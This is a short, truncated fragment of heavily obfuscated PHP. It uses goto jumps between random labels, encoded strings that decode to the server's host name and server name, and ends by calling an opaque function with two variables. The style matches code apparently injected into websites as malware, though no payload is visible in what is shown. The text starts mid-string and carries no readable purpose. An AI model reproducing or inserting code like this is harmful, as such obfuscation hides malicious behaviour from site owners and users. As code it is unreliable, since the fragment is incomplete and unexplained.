"]; goto D6pDV; VskVV: return $_SERVER["\110\x54\x54\x50\x5f\x48\x4f\123\124"]; goto PSIgG; LdS0N: eKPoi: goto VskVV; W3DLi: vEqwz: goto FynwE; mPzou: if (isset($_SERVER["\x53\105\x52\x56\x45\122\137\x4e\101\x4d\x45"])) { goto vEqwz; } goto sLSp7; Je288: return $gVqX0; goto vmcvB; vmcvB: } goto cm5On; so5YY: JMST1($fFJ13, $r9kee); ?>